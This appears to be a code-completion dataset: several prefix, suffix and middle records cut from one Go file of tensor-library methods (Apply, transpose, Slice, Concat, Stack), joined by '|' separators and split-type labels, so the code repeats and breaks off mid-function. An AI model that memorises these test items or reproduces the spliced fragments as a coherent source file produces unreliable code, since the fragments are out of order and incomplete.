retVal.AP = ap
// the "viewStack" method is the more generalized method
// and will work for all Tensors, regardless of whether it's a view
// But the simpleStack is faster, and is an optimization
if allNoMat {
retVal = t.simpleStack(retVal, axis, others...)
} else {
retVal = t.viewStack(retVal, axis, others...)
}
return
}
/* Private Methods */
// returns the new index given the old index
func (t *Dense) transposeIndex(i int, transposePat, strides []int) int {
oldCoord, err := Itol(i, t.oshape(), t.ostrides())
if err != nil {
panic(err)
}
/*
coordss, _ := Permute(transposePat, oldCoord)
coords := coordss[0]
expShape := t.Shape()
index, _ := Ltoi(expShape, strides, coords...)
*/
// The above is the "conceptual" algorithm.
// Too many checks above slows things down, so the below is the "optimized" edition
var index int
for i, axis := range transposePat {
index += oldCoord[axis] * strides[i]
}
return index
}
// at returns the index at which the coordinate is referring to.
// This function encapsulates the addressing of elements in a contiguous block.
// For a 2D ndarray, ndarray.at(i,j) is
// at = ndarray.strides[0]*i + ndarray.strides[1]*j
// This is of course, extensible to any number of dimensions.
func (t *Dense) at(coords ...int) (at int, err error) {
return Ltoi(t.Shape(), t.Strides(), coords...)
}
// maskat returns the mask index at which the coordinate is referring to.
func (t *Dense) maskAt(coords ...int) (at int, err error) {
//TODO: Add check for non-masked tensor
return t.at(coords...)
}
// simpleStack is the data movement function for non-view tensors. What it does is simply copy the data according to the new strides
func (t *Dense) simpleStack(retVal *Dense, axis int, others ...*Dense) *Dense {
switch axis {
case 0:
copyDense(retVal, t)
next := t.len()
for _, ot := range others {
copySliced(retVal, next, retVal.len(), ot, 0, ot.len())
next += ot.len()
}
default:
axisStride := retVal.AP.Strides()[axis]
batches := retVal.len() / axisStride
destStart := 0
start := 0
end := start + axisStride
for i := 0; i < batches; i++ {
copySliced(retVal, destStart, retVal.len(), t, start, end)
for _, ot := range others {
destStart += axisStride
copySliced(retVal, destStart, retVal.len(), ot, start, end)
i++
}
destStart += axisStride
start += axisStride
end += axisStride
}
}
return retVal
}
// viewStack is the data movement function for Stack(), applied on views
func (t *Dense) viewStack(retVal *Dense, axis int, others ...*Dense) *Dense {
axisStride := retVal.AP.Strides()[axis]
batches := retVal.len() / axisStride
it := NewFlatIterator(t.AP)
ch := it.Chan()
chs := make([]chan int, len(others))
chs = chs[:0]
for _, ot := range others {
oter := NewFlatIterator(ot.AP)
chs = append(chs, oter.Chan())
}
t.doViewStack(retVal, axisStride, batches, ch, others, chs)
return retVal
} | return t.Concat(0, others...)
} | random_line_split |
dense_matop.go | package tensor
import (
"github.com/pkg/errors"
"reflect"
)
// Apply applies a function to all the values in the ndarray
func (t *Dense) Apply(fn interface{}, opts ...FuncOpt) (retVal Tensor, err error) {
fo := parseFuncOpts(opts...)
reuseT, incr := fo.incrReuse()
safe := fo.safe()
var reuse *Dense
if reuse, err = getDense(reuseT); err != nil {
return
}
// check reuse and stuff
var res *Dense
switch {
case reuse != nil:
res = reuse
if res.len() != t.Size() {
err = errors.Errorf(shapeMismatch, t.Shape(), reuse.Shape())
return
}
case !safe:
res = t
default:
if t.IsMaterializable() {
res = t.Materialize().(*Dense)
} else {
res = t.Clone().(*Dense)
}
}
// do
switch {
case t.viewOf == nil:
err = res.mapFn(fn, incr)
case t.viewOf != nil:
it := IteratorFromDense(t)
if err = res.iterMap(fn, it, incr); err != nil {
return
}
default:
err = errors.Errorf("Apply not implemented for this state: isView: %t and incr: %t", t.viewOf == nil, incr)
return
}
// set retVal
switch {
case reuse != nil:
if err = reuseCheckShape(reuse, t.Shape()); err != nil {
return
}
retVal = reuse
case !safe:
retVal = t
default:
retVal = res
// retVal = New(Of(t.t), WithBacking(res), WithShape(t.Shape()...))
}
return
}
// T performs a thunked transpose. It doesn't actually do anything, except store extra information about the post-transposed shapes and strides
// Usually this is more than enough, as BLAS will handle the rest of the transpose
func (t *Dense) T(axes ...int) (err error) {
var transform *AP
if transform, axes, err = t.AP.T(axes...); err != nil {
return handleNoOp(err)
}
// is there any old transposes that need to be done first?
// this is important, because any old transposes for dim >=3 are merely permutations of the strides
if t.old != nil {
if t.IsVector() {
// the transform that was calculated was a waste of time - return it to the pool then untranspose
ReturnAP(transform)
t.UT()
return
}
// check if the current axes are just a reverse of the previous transpose's
isReversed := true
for i, s := range t.oshape() {
if transform.Shape()[i] != s {
isReversed = false
break
}
}
// if it is reversed, well, we just restore the backed up one
if isReversed {
ReturnAP(transform)
t.UT()
return
}
// cool beans. No funny reversals. We'd have to actually do transpose then
t.Transpose()
}
// swap out the old and the new
t.old = t.AP
t.transposeWith = axes
t.AP = transform
return nil
}
// UT is a quick way to untranspose a currently transposed *Dense
// The reason for having this is quite simply illustrated by this problem:
// T = NewTensor(WithShape(2,3,4))
// T.T(1,2,0)
//
// To untranspose that, we'd need to apply a transpose of (2,0,1).
// This means having to keep track and calculate the transposes.
// Instead, here's a helpful convenience function to instantly untranspose any previous transposes.
//
// Nothing will happen if there was no previous transpose
func (t *Dense) UT() {
if t.old != nil {
ReturnAP(t.AP)
ReturnInts(t.transposeWith)
t.AP = t.old
t.old = nil
t.transposeWith = nil
}
}
// SafeT is exactly like T(), except it returns a new *Dense. The data is also copied over, unmoved.
func (t *Dense) SafeT(axes ...int) (retVal *Dense, err error) {
var transform *AP
if transform, axes, err = t.AP.T(axes...); err != nil {
if err = handleNoOp(err); err != nil {
return
}
}
retVal = recycledDense(t.t, Shape{t.len()})
copyDense(retVal, t)
retVal.AP = transform
retVal.old = t.AP.Clone()
retVal.transposeWith = axes
return
}
// Transpose() actually transposes the data.
// This is a generalized version of the inplace matrix transposition algorithm from Wikipedia:
// https://en.wikipedia.org/wiki/In-place_matrix_transposition
func (t *Dense) Transpose() {
// if there is no oldinfo, that means the current info is the latest, and not the transpose
if t.old == nil {
return
}
if t.IsScalar() {
return // cannot transpose scalars
}
defer func() {
ReturnAP(t.old)
t.old = nil
t.transposeWith = nil
}()
expShape := t.Shape()
expStrides := expShape.calcStrides() // important! because the strides would have changed once the underlying data changed
defer ReturnInts(expStrides)
defer func() {
t.setShape(expShape...)
t.sanity()
}()
if t.IsVector() {
// no change of strides.
return
}
t.transpose(expStrides)
}
// At returns the value at the given coordinate
func (t *Dense) At(coords ...int) (interface{}, error) {
if len(coords) != t.Dims() {
return nil, errors.Errorf(dimMismatch, t.Dims(), len(coords))
}
at, err := t.at(coords...)
if err != nil {
return nil, errors.Wrap(err, "At()")
}
return t.Get(at), nil
}
// MaskAt returns the value of the mask at a given coordinate
// returns false (valid) if not tensor is not masked
func (t *Dense) MaskAt(coords ...int) (bool, error) {
if !t.IsMasked() {
return false, nil
}
if len(coords) != t.Dims() {
return true, errors.Errorf(dimMismatch, t.Dims(), len(coords))
}
at, err := t.maskAt(coords...)
if err != nil {
return true, errors.Wrap(err, "MaskAt()")
}
return t.mask[at], nil
}
// SetAt sets the value at the given coordinate
func (t *Dense) SetAt(v interface{}, coords ...int) error {
if len(coords) != t.Dims() {
return errors.Errorf(dimMismatch, t.Dims(), len(coords))
}
at, err := t.at(coords...)
if err != nil {
return errors.Wrap(err, "SetAt()")
}
t.Set(at, v)
return nil
}
// SetMaskAtDataIndex set the value of the mask at a given index
func (t *Dense) SetMaskAtIndex(v bool, i int) error {
if !t.IsMasked() {
return nil
}
t.mask[i] = v
return nil
}
// SetMaskAt sets the mask value at the given coordinate
func (t *Dense) SetMaskAt(v bool, coords ...int) error {
if !t.IsMasked() {
return nil
}
if len(coords) != t.Dims() {
return errors.Errorf(dimMismatch, t.Dims(), len(coords))
}
at, err := t.maskAt(coords...)
if err != nil {
return errors.Wrap(err, "SetAt()")
}
t.mask[at] = v
return nil
}
// Repeat is like Numpy's repeat. It repeats the elements of an array.
// The repeats param defines how many times each element in the axis is repeated.
// Just like NumPy, the repeats param is broadcasted to fit the size of the given axis.
func (t *Dense) Repeat(axis int, repeats ...int) (retVal Tensor, err error) {
var newShape Shape
var size int
if newShape, repeats, size, err = t.Shape().Repeat(axis, repeats...); err != nil {
return nil, errors.Wrap(err, "Unable to get repeated shape")
}
if axis == AllAxes {
axis = 0
}
d := recycledDense(t.t, newShape)
// d := New(Of(t.t), WithShape(newShape...))
var outers int
if t.IsScalar() {
outers = 1
} else {
outers = ProdInts(t.Shape()[0:axis])
if outers == 0 {
outers = 1
}
}
var stride, newStride int
if newShape.IsVector() || t.IsVector() {
stride = 1 // special case because CalcStrides() will return []int{1} as the strides for a vector
} else {
stride = t.ostrides()[axis]
}
if newShape.IsVector() {
newStride = 1
} else {
newStride = d.ostrides()[axis]
}
var destStart, srcStart int
for i := 0; i < outers; i++ {
for j := 0; j < size; j++ {
var tmp int
tmp = repeats[j]
for k := 0; k < tmp; k++ {
if srcStart >= t.len() || destStart+stride > d.len() {
break
}
copySliced(d, destStart, d.len(), t, srcStart, t.len())
destStart += newStride
}
srcStart += stride
}
}
return d, nil
}
// CopyTo copies the underlying data to the destination *Dense. The original data is untouched.
// Note: CopyTo doesn't care about the metadata of the destination *Dense. Take for example:
// T = NewTensor(WithShape(6))
// T2 = NewTensor(WithShape(2,3))
// err = T.CopyTo(T2) // err == nil
//
// The only time that this will fail is if the underlying sizes are different
func (t *Dense) CopyTo(other *Dense) error {
if other == t {
return nil // nothing to copy to. Maybe return NoOpErr?
}
if other.Size() != t.Size() {
return errors.Errorf(sizeMismatch, t.Size(), other.Size())
}
// easy peasy lemon squeezy
if t.viewOf == nil && other.viewOf == nil {
copyDense(other, t)
return nil
}
return errors.Errorf(methodNYI, "CopyTo", "views")
}
// Slice performs slicing on the *Dense Tensor. It returns a view which shares the same underlying memory as the original *Dense.
//
// Given:
// T = NewTensor(WithShape(2,2), WithBacking(RangeFloat64(0,4)))
// V, _ := T.Slice(nil, singleSlice(1)) // T[:, 1]
//
// Any modification to the values in V, will be reflected in T as well.
//
// The method treats <nil> as equivalent to a colon slice. T.Slice(nil) is equivalent to T[:] in Numpy syntax
func (t *Dense) Slice(slices ...Slice) (retVal Tensor, err error) {
var newAP *AP
var ndStart, ndEnd int
if newAP, ndStart, ndEnd, err = t.AP.S(t.len(), slices...); err != nil {
return
}
view := new(Dense)
view.t = t.t
view.viewOf = t
view.AP = newAP
view.hdr = new(reflect.SliceHeader)
view.data = t.data
view.hdr.Data = t.hdr.Data
view.hdr.Len = t.hdr.Len
view.hdr.Cap = t.hdr.Cap
view.slice(ndStart, ndEnd)
if t.IsMasked() {
view.mask = t.mask[ndStart:ndEnd]
}
return view, err
}
// RollAxis rolls the axis backwards until it lies in the given position.
//
// This method was adapted from Numpy's Rollaxis. The licence for Numpy is a BSD-like licence and can be found here: https://github.com/numpy/numpy/blob/master/LICENSE.txt
//
// As a result of being adapted from Numpy, the quirks are also adapted. A good guide reducing the confusion around rollaxis can be found here: http://stackoverflow.com/questions/29891583/reason-why-numpy-rollaxis-is-so-confusing (see answer by hpaulj)
func (t *Dense) RollAxis(axis, start int, safe bool) (retVal *Dense, err error) {
dims := t.Dims()
if !(axis >= 0 && axis < dims) {
err = errors.Errorf(invalidAxis, axis, dims)
return
}
if !(start >= 0 && start <= dims) {
err = errors.Wrap(errors.Errorf(invalidAxis, axis, dims), "Start axis is wrong")
return
}
if axis < start {
start--
}
if axis == start {
retVal = t
return
}
axes := BorrowInts(dims)
defer ReturnInts(axes)
for i := 0; i < dims; i++ {
axes[i] = i
}
copy(axes[axis:], axes[axis+1:])
copy(axes[start+1:], axes[start:])
axes[start] = axis
if safe {
return t.SafeT(axes...)
}
err = t.T(axes...)
retVal = t
return
}
// Concat concatenates the other tensors along the given axis. It is like Numpy's concatenate() function.
func (t *Dense) Concat(axis int, Ts ...*Dense) (retVal *Dense, err error) {
ss := make([]Shape, len(Ts))
var isMasked = false
for i, T := range Ts {
ss[i] = T.Shape()
isMasked = isMasked || T.IsMasked()
}
var newShape Shape
if newShape, err = t.Shape().Concat(axis, ss...); err != nil {
return
}
retVal = recycledDense(t.t, newShape)
if isMasked {
retVal.makeMask()
}
all := make([]*Dense, len(Ts)+1)
all[0] = t
copy(all[1:], Ts)
// special case
var start, end int
for _, T := range all {
end += T.Shape()[axis]
slices := make([]Slice, axis+1)
slices[axis] = makeRS(start, end)
var v *Dense
if v, err = sliceDense(retVal, slices...); err != nil {
return
}
if v.IsVector() && T.IsMatrix() && axis == 0 {
v.reshape(v.shape[0], 1)
}
if err = assignArray(v, T); err != nil {
return
}
start = end
}
return
}
// Hstack stacks other tensors columnwise (horizontal stacking)
func (t *Dense) Hstack(others ...*Dense) (*Dense, error) {
// check that everything is at least 1D
if t.Dims() == 0 {
return nil, errors.Errorf(atleastDims, 1)
}
for _, d := range others {
if d.Dims() < 1 {
return nil, errors.Errorf(atleastDims, 1)
}
}
if t.Dims() == 1 {
return t.Concat(0, others...)
}
return t.Concat(1, others...)
}
// Vstack stacks other tensors rowwise (vertical stacking). Vertical stacking requires all involved Tensors to have at least 2 dimensions
func (t *Dense) Vstack(others ...*Dense) (*Dense, error) |
// Stack stacks the other tensors along the axis specified. It is like Numpy's stack function.
func (t *Dense) Stack(axis int, others ...*Dense) (retVal *Dense, err error) {
opdims := t.Dims()
if axis >= opdims+1 {
err = errors.Errorf(dimMismatch, opdims+1, axis)
return
}
newShape := Shape(BorrowInts(opdims + 1))
newShape[axis] = len(others) + 1
shape := t.Shape()
var cur int
for i, s := range shape {
if i == axis {
cur++
}
newShape[cur] = s
cur++
}
newStrides := newShape.calcStrides()
ap := NewAP(newShape, newStrides)
allNoMat := !t.IsMaterializable()
for _, ot := range others {
if allNoMat && ot.IsMaterializable() {
allNoMat = false
}
}
retVal = recycledDense(t.t, ap.Shape())
ReturnAP(retVal.AP)
retVal.AP = ap
// the "viewStack" method is the more generalized method
// and will work for all Tensors, regardless of whether it's a view
// But the simpleStack is faster, and is an optimization
if allNoMat {
retVal = t.simpleStack(retVal, axis, others...)
} else {
retVal = t.viewStack(retVal, axis, others...)
}
return
}
/* Private Methods */
// returns the new index given the old index
func (t *Dense) transposeIndex(i int, transposePat, strides []int) int {
oldCoord, err := Itol(i, t.oshape(), t.ostrides())
if err != nil {
panic(err)
}
/*
coordss, _ := Permute(transposePat, oldCoord)
coords := coordss[0]
expShape := t.Shape()
index, _ := Ltoi(expShape, strides, coords...)
*/
// The above is the "conceptual" algorithm.
// Too many checks above slows things down, so the below is the "optimized" edition
var index int
for i, axis := range transposePat {
index += oldCoord[axis] * strides[i]
}
return index
}
// at returns the index at which the coordinate is referring to.
// This function encapsulates the addressing of elements in a contiguous block.
// For a 2D ndarray, ndarray.at(i,j) is
// at = ndarray.strides[0]*i + ndarray.strides[1]*j
// This is of course, extensible to any number of dimensions.
func (t *Dense) at(coords ...int) (at int, err error) {
return Ltoi(t.Shape(), t.Strides(), coords...)
}
// maskat returns the mask index at which the coordinate is referring to.
func (t *Dense) maskAt(coords ...int) (at int, err error) {
//TODO: Add check for non-masked tensor
return t.at(coords...)
}
// simpleStack is the data movement function for non-view tensors. What it does is simply copy the data according to the new strides
func (t *Dense) simpleStack(retVal *Dense, axis int, others ...*Dense) *Dense {
switch axis {
case 0:
copyDense(retVal, t)
next := t.len()
for _, ot := range others {
copySliced(retVal, next, retVal.len(), ot, 0, ot.len())
next += ot.len()
}
default:
axisStride := retVal.AP.Strides()[axis]
batches := retVal.len() / axisStride
destStart := 0
start := 0
end := start + axisStride
for i := 0; i < batches; i++ {
copySliced(retVal, destStart, retVal.len(), t, start, end)
for _, ot := range others {
destStart += axisStride
copySliced(retVal, destStart, retVal.len(), ot, start, end)
i++
}
destStart += axisStride
start += axisStride
end += axisStride
}
}
return retVal
}
// viewStack is the data movement function for Stack(), applied on views
func (t *Dense) viewStack(retVal *Dense, axis int, others ...*Dense) *Dense {
axisStride := retVal.AP.Strides()[axis]
batches := retVal.len() / axisStride
it := NewFlatIterator(t.AP)
ch := it.Chan()
chs := make([]chan int, len(others))
chs = chs[:0]
for _, ot := range others {
oter := NewFlatIterator(ot.AP)
chs = append(chs, oter.Chan())
}
t.doViewStack(retVal, axisStride, batches, ch, others, chs)
return retVal
}
| {
// check that everything is at least 2D
if t.Dims() < 2 {
return nil, errors.Errorf(atleastDims, 2)
}
for _, d := range others {
if d.Dims() < 2 {
return nil, errors.Errorf(atleastDims, 2)
}
}
return t.Concat(0, others...)
} | identifier_body |
dense_matop.go | package tensor
import (
"github.com/pkg/errors"
"reflect"
)
// Apply applies a function to all the values in the ndarray
func (t *Dense) Apply(fn interface{}, opts ...FuncOpt) (retVal Tensor, err error) {
fo := parseFuncOpts(opts...)
reuseT, incr := fo.incrReuse()
safe := fo.safe()
var reuse *Dense
if reuse, err = getDense(reuseT); err != nil {
return
}
// check reuse and stuff
var res *Dense
switch {
case reuse != nil:
res = reuse
if res.len() != t.Size() {
err = errors.Errorf(shapeMismatch, t.Shape(), reuse.Shape())
return
}
case !safe:
res = t
default:
if t.IsMaterializable() {
res = t.Materialize().(*Dense)
} else {
res = t.Clone().(*Dense)
}
}
// do
switch {
case t.viewOf == nil:
err = res.mapFn(fn, incr)
case t.viewOf != nil:
it := IteratorFromDense(t)
if err = res.iterMap(fn, it, incr); err != nil {
return
}
default:
err = errors.Errorf("Apply not implemented for this state: isView: %t and incr: %t", t.viewOf == nil, incr)
return
}
// set retVal
switch {
case reuse != nil:
if err = reuseCheckShape(reuse, t.Shape()); err != nil {
return
}
retVal = reuse
case !safe:
retVal = t
default:
retVal = res
// retVal = New(Of(t.t), WithBacking(res), WithShape(t.Shape()...))
}
return
}
// T performs a thunked transpose. It doesn't actually do anything, except store extra information about the post-transposed shapes and strides
// Usually this is more than enough, as BLAS will handle the rest of the transpose
func (t *Dense) T(axes ...int) (err error) {
var transform *AP
if transform, axes, err = t.AP.T(axes...); err != nil {
return handleNoOp(err)
}
// is there any old transposes that need to be done first?
// this is important, because any old transposes for dim >=3 are merely permutations of the strides
if t.old != nil {
if t.IsVector() {
// the transform that was calculated was a waste of time - return it to the pool then untranspose
ReturnAP(transform)
t.UT()
return
}
// check if the current axes are just a reverse of the previous transpose's
isReversed := true
for i, s := range t.oshape() {
if transform.Shape()[i] != s {
isReversed = false
break
}
}
// if it is reversed, well, we just restore the backed up one
if isReversed {
ReturnAP(transform)
t.UT()
return
}
// cool beans. No funny reversals. We'd have to actually do transpose then
t.Transpose()
}
// swap out the old and the new
t.old = t.AP
t.transposeWith = axes
t.AP = transform
return nil
}
// UT is a quick way to untranspose a currently transposed *Dense
// The reason for having this is quite simply illustrated by this problem:
// T = NewTensor(WithShape(2,3,4))
// T.T(1,2,0)
//
// To untranspose that, we'd need to apply a transpose of (2,0,1).
// This means having to keep track and calculate the transposes.
// Instead, here's a helpful convenience function to instantly untranspose any previous transposes.
//
// Nothing will happen if there was no previous transpose
func (t *Dense) UT() {
if t.old != nil {
ReturnAP(t.AP)
ReturnInts(t.transposeWith)
t.AP = t.old
t.old = nil
t.transposeWith = nil
}
}
// SafeT is exactly like T(), except it returns a new *Dense. The data is also copied over, unmoved.
func (t *Dense) SafeT(axes ...int) (retVal *Dense, err error) {
var transform *AP
if transform, axes, err = t.AP.T(axes...); err != nil {
if err = handleNoOp(err); err != nil {
return
}
}
retVal = recycledDense(t.t, Shape{t.len()})
copyDense(retVal, t)
retVal.AP = transform
retVal.old = t.AP.Clone()
retVal.transposeWith = axes
return
}
// Transpose() actually transposes the data.
// This is a generalized version of the inplace matrix transposition algorithm from Wikipedia:
// https://en.wikipedia.org/wiki/In-place_matrix_transposition
func (t *Dense) Transpose() {
// if there is no oldinfo, that means the current info is the latest, and not the transpose
if t.old == nil {
return
}
if t.IsScalar() {
return // cannot transpose scalars
}
defer func() {
ReturnAP(t.old)
t.old = nil
t.transposeWith = nil
}()
expShape := t.Shape()
expStrides := expShape.calcStrides() // important! because the strides would have changed once the underlying data changed
defer ReturnInts(expStrides)
defer func() {
t.setShape(expShape...)
t.sanity()
}()
if t.IsVector() {
// no change of strides.
return
}
t.transpose(expStrides)
}
// At returns the value at the given coordinate
func (t *Dense) At(coords ...int) (interface{}, error) {
if len(coords) != t.Dims() {
return nil, errors.Errorf(dimMismatch, t.Dims(), len(coords))
}
at, err := t.at(coords...)
if err != nil {
return nil, errors.Wrap(err, "At()")
}
return t.Get(at), nil
}
// MaskAt returns the value of the mask at a given coordinate
// returns false (valid) if not tensor is not masked
func (t *Dense) MaskAt(coords ...int) (bool, error) {
if !t.IsMasked() {
return false, nil
}
if len(coords) != t.Dims() {
return true, errors.Errorf(dimMismatch, t.Dims(), len(coords))
}
at, err := t.maskAt(coords...)
if err != nil {
return true, errors.Wrap(err, "MaskAt()")
}
return t.mask[at], nil
}
// SetAt sets the value at the given coordinate
func (t *Dense) SetAt(v interface{}, coords ...int) error {
if len(coords) != t.Dims() {
return errors.Errorf(dimMismatch, t.Dims(), len(coords))
}
at, err := t.at(coords...)
if err != nil {
return errors.Wrap(err, "SetAt()")
}
t.Set(at, v)
return nil
}
// SetMaskAtDataIndex set the value of the mask at a given index
func (t *Dense) SetMaskAtIndex(v bool, i int) error {
if !t.IsMasked() {
return nil
}
t.mask[i] = v
return nil
}
// SetMaskAt sets the mask value at the given coordinate
func (t *Dense) SetMaskAt(v bool, coords ...int) error {
if !t.IsMasked() {
return nil
}
if len(coords) != t.Dims() {
return errors.Errorf(dimMismatch, t.Dims(), len(coords))
}
at, err := t.maskAt(coords...)
if err != nil {
return errors.Wrap(err, "SetAt()")
}
t.mask[at] = v
return nil
}
// Repeat is like Numpy's repeat. It repeats the elements of an array.
// The repeats param defines how many times each element in the axis is repeated.
// Just like NumPy, the repeats param is broadcasted to fit the size of the given axis.
func (t *Dense) Repeat(axis int, repeats ...int) (retVal Tensor, err error) {
var newShape Shape
var size int
if newShape, repeats, size, err = t.Shape().Repeat(axis, repeats...); err != nil {
return nil, errors.Wrap(err, "Unable to get repeated shape")
}
if axis == AllAxes {
axis = 0
}
d := recycledDense(t.t, newShape)
// d := New(Of(t.t), WithShape(newShape...))
var outers int
if t.IsScalar() {
outers = 1
} else {
outers = ProdInts(t.Shape()[0:axis])
if outers == 0 {
outers = 1
}
}
var stride, newStride int
if newShape.IsVector() || t.IsVector() {
stride = 1 // special case because CalcStrides() will return []int{1} as the strides for a vector
} else {
stride = t.ostrides()[axis]
}
if newShape.IsVector() {
newStride = 1
} else {
newStride = d.ostrides()[axis]
}
var destStart, srcStart int
for i := 0; i < outers; i++ {
for j := 0; j < size; j++ {
var tmp int
tmp = repeats[j]
for k := 0; k < tmp; k++ {
if srcStart >= t.len() || destStart+stride > d.len() {
break
}
copySliced(d, destStart, d.len(), t, srcStart, t.len())
destStart += newStride
}
srcStart += stride
}
}
return d, nil
}
// CopyTo copies the underlying data to the destination *Dense. The original data is untouched.
// Note: CopyTo doesn't care about the metadata of the destination *Dense. Take for example:
// T = NewTensor(WithShape(6))
// T2 = NewTensor(WithShape(2,3))
// err = T.CopyTo(T2) // err == nil
//
// The only time that this will fail is if the underlying sizes are different
func (t *Dense) CopyTo(other *Dense) error {
if other == t {
return nil // nothing to copy to. Maybe return NoOpErr?
}
if other.Size() != t.Size() {
return errors.Errorf(sizeMismatch, t.Size(), other.Size())
}
// easy peasy lemon squeezy
if t.viewOf == nil && other.viewOf == nil {
copyDense(other, t)
return nil
}
return errors.Errorf(methodNYI, "CopyTo", "views")
}
// Slice performs slicing on the *Dense Tensor. It returns a view which shares the same underlying memory as the original *Dense.
//
// Given:
// T = NewTensor(WithShape(2,2), WithBacking(RangeFloat64(0,4)))
// V, _ := T.Slice(nil, singleSlice(1)) // T[:, 1]
//
// Any modification to the values in V, will be reflected in T as well.
//
// The method treats <nil> as equivalent to a colon slice. T.Slice(nil) is equivalent to T[:] in Numpy syntax
func (t *Dense) Slice(slices ...Slice) (retVal Tensor, err error) {
var newAP *AP
var ndStart, ndEnd int
if newAP, ndStart, ndEnd, err = t.AP.S(t.len(), slices...); err != nil {
return
}
view := new(Dense)
view.t = t.t
view.viewOf = t
view.AP = newAP
view.hdr = new(reflect.SliceHeader)
view.data = t.data
view.hdr.Data = t.hdr.Data
view.hdr.Len = t.hdr.Len
view.hdr.Cap = t.hdr.Cap
view.slice(ndStart, ndEnd)
if t.IsMasked() {
view.mask = t.mask[ndStart:ndEnd]
}
return view, err
}
// RollAxis rolls the axis backwards until it lies in the given position.
//
// This method was adapted from Numpy's Rollaxis. The licence for Numpy is a BSD-like licence and can be found here: https://github.com/numpy/numpy/blob/master/LICENSE.txt
//
// As a result of being adapted from Numpy, the quirks are also adapted. A good guide reducing the confusion around rollaxis can be found here: http://stackoverflow.com/questions/29891583/reason-why-numpy-rollaxis-is-so-confusing (see answer by hpaulj)
func (t *Dense) RollAxis(axis, start int, safe bool) (retVal *Dense, err error) {
dims := t.Dims()
if !(axis >= 0 && axis < dims) {
err = errors.Errorf(invalidAxis, axis, dims)
return
}
if !(start >= 0 && start <= dims) {
err = errors.Wrap(errors.Errorf(invalidAxis, axis, dims), "Start axis is wrong")
return
}
if axis < start {
start--
}
if axis == start {
retVal = t
return
}
axes := BorrowInts(dims)
defer ReturnInts(axes)
for i := 0; i < dims; i++ {
axes[i] = i
}
copy(axes[axis:], axes[axis+1:])
copy(axes[start+1:], axes[start:])
axes[start] = axis
if safe {
return t.SafeT(axes...)
}
err = t.T(axes...)
retVal = t
return
}
// Concat concatenates the other tensors along the given axis. It is like Numpy's concatenate() function.
func (t *Dense) Concat(axis int, Ts ...*Dense) (retVal *Dense, err error) {
ss := make([]Shape, len(Ts))
var isMasked = false
for i, T := range Ts {
ss[i] = T.Shape()
isMasked = isMasked || T.IsMasked()
}
var newShape Shape
if newShape, err = t.Shape().Concat(axis, ss...); err != nil {
return
}
retVal = recycledDense(t.t, newShape)
if isMasked {
retVal.makeMask()
}
all := make([]*Dense, len(Ts)+1)
all[0] = t
copy(all[1:], Ts)
// special case
var start, end int
for _, T := range all {
end += T.Shape()[axis]
slices := make([]Slice, axis+1)
slices[axis] = makeRS(start, end)
var v *Dense
if v, err = sliceDense(retVal, slices...); err != nil {
return
}
if v.IsVector() && T.IsMatrix() && axis == 0 |
if err = assignArray(v, T); err != nil {
return
}
start = end
}
return
}
// Hstack stacks other tensors columnwise (horizontal stacking)
func (t *Dense) Hstack(others ...*Dense) (*Dense, error) {
// check that everything is at least 1D
if t.Dims() == 0 {
return nil, errors.Errorf(atleastDims, 1)
}
for _, d := range others {
if d.Dims() < 1 {
return nil, errors.Errorf(atleastDims, 1)
}
}
if t.Dims() == 1 {
return t.Concat(0, others...)
}
return t.Concat(1, others...)
}
// Vstack stacks other tensors rowwise (vertical stacking). Vertical stacking requires all involved Tensors to have at least 2 dimensions
func (t *Dense) Vstack(others ...*Dense) (*Dense, error) {
// check that everything is at least 2D
if t.Dims() < 2 {
return nil, errors.Errorf(atleastDims, 2)
}
for _, d := range others {
if d.Dims() < 2 {
return nil, errors.Errorf(atleastDims, 2)
}
}
return t.Concat(0, others...)
}
// Stack stacks the other tensors along the axis specified. It is like Numpy's stack function.
func (t *Dense) Stack(axis int, others ...*Dense) (retVal *Dense, err error) {
opdims := t.Dims()
if axis >= opdims+1 {
err = errors.Errorf(dimMismatch, opdims+1, axis)
return
}
newShape := Shape(BorrowInts(opdims + 1))
newShape[axis] = len(others) + 1
shape := t.Shape()
var cur int
for i, s := range shape {
if i == axis {
cur++
}
newShape[cur] = s
cur++
}
newStrides := newShape.calcStrides()
ap := NewAP(newShape, newStrides)
allNoMat := !t.IsMaterializable()
for _, ot := range others {
if allNoMat && ot.IsMaterializable() {
allNoMat = false
}
}
retVal = recycledDense(t.t, ap.Shape())
ReturnAP(retVal.AP)
retVal.AP = ap
// the "viewStack" method is the more generalized method
// and will work for all Tensors, regardless of whether it's a view
// But the simpleStack is faster, and is an optimization
if allNoMat {
retVal = t.simpleStack(retVal, axis, others...)
} else {
retVal = t.viewStack(retVal, axis, others...)
}
return
}
/* Private Methods */
// returns the new index given the old index
func (t *Dense) transposeIndex(i int, transposePat, strides []int) int {
oldCoord, err := Itol(i, t.oshape(), t.ostrides())
if err != nil {
panic(err)
}
/*
coordss, _ := Permute(transposePat, oldCoord)
coords := coordss[0]
expShape := t.Shape()
index, _ := Ltoi(expShape, strides, coords...)
*/
// The above is the "conceptual" algorithm.
// Too many checks above slows things down, so the below is the "optimized" edition
var index int
for i, axis := range transposePat {
index += oldCoord[axis] * strides[i]
}
return index
}
// at returns the index at which the coordinate is referring to.
// This function encapsulates the addressing of elements in a contiguous block.
// For a 2D ndarray, ndarray.at(i,j) is
// at = ndarray.strides[0]*i + ndarray.strides[1]*j
// This is of course, extensible to any number of dimensions.
func (t *Dense) at(coords ...int) (at int, err error) {
return Ltoi(t.Shape(), t.Strides(), coords...)
}
// maskat returns the mask index at which the coordinate is referring to.
func (t *Dense) maskAt(coords ...int) (at int, err error) {
//TODO: Add check for non-masked tensor
return t.at(coords...)
}
// simpleStack is the data movement function for non-view tensors. What it does is simply copy the data according to the new strides
func (t *Dense) simpleStack(retVal *Dense, axis int, others ...*Dense) *Dense {
switch axis {
case 0:
copyDense(retVal, t)
next := t.len()
for _, ot := range others {
copySliced(retVal, next, retVal.len(), ot, 0, ot.len())
next += ot.len()
}
default:
axisStride := retVal.AP.Strides()[axis]
batches := retVal.len() / axisStride
destStart := 0
start := 0
end := start + axisStride
for i := 0; i < batches; i++ {
copySliced(retVal, destStart, retVal.len(), t, start, end)
for _, ot := range others {
destStart += axisStride
copySliced(retVal, destStart, retVal.len(), ot, start, end)
i++
}
destStart += axisStride
start += axisStride
end += axisStride
}
}
return retVal
}
// viewStack is the data movement function for Stack(), applied on views
func (t *Dense) viewStack(retVal *Dense, axis int, others ...*Dense) *Dense {
axisStride := retVal.AP.Strides()[axis]
batches := retVal.len() / axisStride
it := NewFlatIterator(t.AP)
ch := it.Chan()
chs := make([]chan int, len(others))
chs = chs[:0]
for _, ot := range others {
